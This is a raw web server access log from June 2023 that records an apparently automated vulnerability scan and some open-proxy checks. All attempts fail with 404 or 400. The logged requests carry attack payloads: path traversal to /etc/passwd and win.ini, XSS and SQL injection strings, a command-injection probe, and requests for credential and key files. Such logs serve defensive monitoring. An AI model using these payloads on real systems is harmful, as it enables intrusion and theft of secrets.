107.189.31.184 - - [17/Jun/2023:02:56:32 +0530] "GET /filezilla.xml HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:56:34 +0530] "GET /sitemanager.xml HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:02:56:35 +0530] "GET /sitemanager.xml HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:02:56:36 +0530] "GET /FileZilla.xml HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:56:36 +0530] "GET /FileZilla.xml HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:02:56:38 +0530] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:02:56:40 +0530] "GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:02:56:42 +0530] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:02:56:42 +0530] "GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:02:58:33 +0530] "GET /LoadFrame?frame_name=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E&src=x HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:58:34 +0530] "GET /LoadFrame?frame_name=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E&src=x HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:02:59:10 +0530] "POST /classes/Master.php?f=delete_supplier HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:02:59:11 +0530] "POST /classes/Master.php?f=delete_supplier HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:03:01:04 +0530] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:03:01:05 +0530] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 1062
107.189.31.184 - - [17/Jun/2023:03:02:40 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:03:02:41 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:03:02:42 +0530] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:03:02:43 +0530] "GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:03:07:54 +0530] "GET /wnm/login/login.json HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:03:07:55 +0530] "GET /wnm/login/login.json HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:03:13:56 +0530] "GET /user.ini HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:03:13:58 +0530] "GET /user.ini HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:03:13:58 +0530] "GET /.user.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:14:00 +0530] "GET /.user.ini HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:15:07 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_mtfireeagle HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:15:08 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_mtfireeagle HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:15:38 +0530] "GET /passwordrecovered.cgi?id=nuclei HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:03:15:39 +0530] "GET /passwordrecovered.cgi?id=nuclei HTTP/1.1" 404 1036
195.205.161.12 - - [17/Jun/2023:03:16:58 +0530] "GET / HTTP/1.1" 200 11250
60.217.75.70 - - [17/Jun/2023:03:19:21 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:03:20:07 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:03:20:07 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:03:20:12 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:03:20:12 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:03:20:17 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:03:20:17 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:03:20:22 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:03:20:22 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:03:21:19 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:03:21:19 +0530] "POST /casa/nodes/thumbprints HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:03:21:21 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:03:21:21 +0530] "POST /webtools/control/SOAPService HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:03:22:37 +0530] "GET /status?full=true HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:03:22:37 +0530] "GET /status?full=true HTTP/1.1" 404 1006
45.128.232.141 - - [17/Jun/2023:03:22:39 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:03:23:33 +0530] "POST /api/user/reg HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:03:23:34 +0530] "POST /api/user/reg HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:03:23:36 +0530] "GET /api/group/list HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:03:23:37 +0530] "GET /api/group/list HTTP/1.1" 404 1022
198.144.159.126 - - [17/Jun/2023:03:24:24 +0530] "CONNECT cn.bing.com:443 HTTP/1.1" 400 -
209.141.41.129 - - [17/Jun/2023:03:24:27 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:03:25:20 +0530] "GET /ws_ftp.ini HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:03:25:21 +0530] "GET /ws_ftp.ini HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:03:28:29 +0530] "GET /liquibase HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:28:29 +0530] "GET /liquibase HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:28:32 +0530] "GET /actuator/liquibase HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:03:28:32 +0530] "GET /actuator/liquibase HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:03:29:43 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:03:29:44 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:03:30:21 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:03:30:22 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:03:30:23 +0530] "GET /x HTTP/1.1" 404 996
107.189.31.184 - - [17/Jun/2023:03:30:24 +0530] "GET /x HTTP/1.1" 404 996
107.189.31.184 - - [17/Jun/2023:03:31:17 +0530] "GET /.netrc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:03:31:18 +0530] "GET /.netrc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:03:31:20 +0530] "GET /_netrc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:03:31:21 +0530] "GET /_netrc HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:03:34:03 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jukebox HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:34:04 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_jukebox HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:35:48 +0530] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1106
107.189.31.184 - - [17/Jun/2023:03:35:48 +0530] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1106
107.189.31.184 - - [17/Jun/2023:03:35:52 +0530] "GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1134
107.189.31.184 - - [17/Jun/2023:03:35:52 +0530] "GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1134
205.210.31.85 - - [17/Jun/2023:03:37:20 +0530] "GET / HTTP/1.1" 200 11250
60.217.75.70 - - [17/Jun/2023:03:37:43 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:03:40:35 +0530] "GET /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:03:40:36 +0530] "GET /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:03:43:57 +0530] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:03:43:57 +0530] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 400 -
45.128.232.141 - - [17/Jun/2023:03:47:14 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:03:47:16 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_onlineexam HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:47:16 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_onlineexam HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:03:47:35 +0530] "GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:03:47:36 +0530] "GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:03:50:16 +0530] "GET /installation/index.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:03:50:17 +0530] "GET /installation/index.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:03:50:20 +0530] "GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:03:50:21 +0530] "GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:03:51:20 +0530] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:03:51:21 +0530] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 1014
90.151.171.108 - - [17/Jun/2023:03:51:54 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:03:51:54 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:03:51:59 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:03:51:59 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:03:52:04 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:03:52:04 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [17/Jun/2023:03:52:09 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:03:52:09 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:03:54:29 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:03:54:30 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:03:55:54 +0530] "GET /net/net/net.html HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:03:55:54 +0530] "GET /net/net/net.html HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:03:56:00 +0530] "GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1" 404 1110
107.189.31.184 - - [17/Jun/2023:03:56:00 +0530] "GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1" 404 1110
107.189.31.184 - - [17/Jun/2023:03:56:02 +0530] "GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1" 404 1100
107.189.31.184 - - [17/Jun/2023:03:56:02 +0530] "GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1" 404 1100
107.189.31.184 - - [17/Jun/2023:03:59:42 +0530] "GET /device.rsp?cmd=list&opt=user HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:03:59:43 +0530] "GET /device.rsp?cmd=list&opt=user HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:04:00:50 +0530] "GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:04:00:51 +0530] "GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:04:03:09 +0530] "GET /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:04:03:09 +0530] "GET /api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0 HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:04:04:44 +0530] "GET /_admin/imgdownload.php?filename=imgdownload.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:04:04:45 +0530] "GET /_admin/imgdownload.php?filename=imgdownload.php HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:04:05:26 +0530] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:04:05:27 +0530] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:04:05:46 +0530] "GET /%2f/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:05:47 +0530] "GET /%2f/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:05:48 +0530] "GET /sample-apps/hello/%2f/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:05:49 +0530] "GET /sample-apps/hello/%2f/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:08:43 +0530] "GET /libraries/joomla/database/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:04:08:44 +0530] "GET /libraries/joomla/database/ HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:04:09:14 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:09:14 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:09:17 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:09:17 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:13:41 +0530] "GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_joomlaupdater HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:04:13:41 +0530] "GET /index.php?controller=../../../../../../../etc/passwd%00&option=com_joomlaupdater HTTP/1.1" 404 1012
198.235.24.198 - - [17/Jun/2023:04:17:28 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:18:04 +0530] "GET /wp-json/acf/v3/options/a?field=plugins&id=active HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:04:18:04 +0530] "GET /wp-json/acf/v3/options/a?field=plugins&id=active HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:04:18:23 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:04:18:23 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:04:19:21 +0530] "POST /page/exportImport/uploadOperation.jsp HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:04:19:22 +0530] "POST /page/exportImport/uploadOperation.jsp HTTP/1.1" 404 1068
107.189.31.184 - - [17/Jun/2023:04:19:24 +0530] "GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1" 404 1070
107.189.31.184 - - [17/Jun/2023:04:19:25 +0530] "GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1" 404 1070
90.151.171.106 - - [17/Jun/2023:04:20:27 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:04:20:27 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:04:20:27 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:20:27 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:20:32 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:04:20:32 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:20:32 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:04:20:32 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:04:21:01 +0530] "GET /google-api-private-key.json HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:04:21:02 +0530] "GET /google-api-private-key.json HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:04:21:04 +0530] "GET /app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1086
107.189.31.184 - - [17/Jun/2023:04:21:04 +0530] "GET /app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1086
107.189.31.184 - - [17/Jun/2023:04:21:07 +0530] "GET /pimcore/app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:04:21:07 +0530] "GET /pimcore/app/config/pimcore/google-api-private-key.json HTTP/1.1" 404 1102
107.189.31.184 - - [17/Jun/2023:04:23:09 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:23:09 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:23:12 +0530] "GET /ganglia/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:04:23:12 +0530] "GET /ganglia/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:04:23:17 +0530] "GET /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:04:23:18 +0530] "GET /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:04:24:26 +0530] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:24:28 +0530] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:28:11 +0530] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:28:11 +0530] "GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:28:14 +0530] "GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:28:14 +0530] "GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:28:40 +0530] "GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:04:28:40 +0530] "GET /wp-admin/admin-ajax.php?action=shareaholic_debug_info HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:04:28:43 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:28:45 +0530] "GET / HTTP/1.1" 200 11250
128.14.134.134 - - [17/Jun/2023:04:30:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:30:49 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multimap HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:04:30:50 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multimap HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:04:32:12 +0530] "GET /ucmdb-api/connect HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:04:32:13 +0530] "GET /ucmdb-api/connect HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:04:35:30 +0530] "POST /api/content/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:04:35:31 +0530] "POST /api/content/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:04:35:33 +0530] "GET /2RHotyknG1cQjNGR6ykhqsARk2S.jsp HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:04:35:34 +0530] "GET /2RHotyknG1cQjNGR6ykhqsARk2S.jsp HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:04:37:00 +0530] "GET /prometheus HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:04:37:01 +0530] "GET /prometheus HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:04:37:03 +0530] "GET /actuator/prometheus HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:04:37:04 +0530] "GET /actuator/prometheus HTTP/1.1" 404 1032
198.98.53.107 - - [17/Jun/2023:04:37:58 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:04:38:45 +0530] "POST /integration/saveGangster.action HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:04:38:46 +0530] "POST /integration/saveGangster.action HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:04:40:39 +0530] "POST /config/pw_snmp_done.html HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:04:40:39 +0530] "POST /config/pw_snmp_done.html HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:04:40:42 +0530] "GET /config/pw_snmp.html HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:04:40:42 +0530] "GET /config/pw_snmp.html HTTP/1.1" 404 1032
161.97.168.128 - - [17/Jun/2023:04:47:40 +0530] "GET / HTTP/1.1" 200 11250
161.97.168.128 - - [17/Jun/2023:04:47:40 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:04:48:35 +0530] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:04:48:35 +0530] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 404 1074
107.189.31.184 - - [17/Jun/2023:04:49:54 +0530] "GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:04:49:56 +0530] "GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:04:49:56 +0530] "GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:04:49:58 +0530] "GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:04:51:07 +0530] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:04:51:08 +0530] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 1084
90.151.171.106 - - [17/Jun/2023:04:52:16 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:52:16 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:04:52:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:04:52:16 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:04:52:16 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:52:21 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:04:52:21 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:04:52:21 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:04:52:37 +0530] "GET /self.key HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:04:52:37 +0530] "GET /self.key HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:04:53:36 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:53:37 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:53:38 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:53:39 +0530] "GET /backup2.cgi HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:04:55:44 +0530] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:46 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:48 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:49 +0530] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:51 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:52 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:53 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:55 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:55 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:58 +0530] "GET /app?service=page/PrinterList HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:55:58 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:56:01 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:56:04 +0530] "POST /app HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:04:56:07 +0530] "GET /app?service=page/PrinterList HTTP/1.1" 404 1000
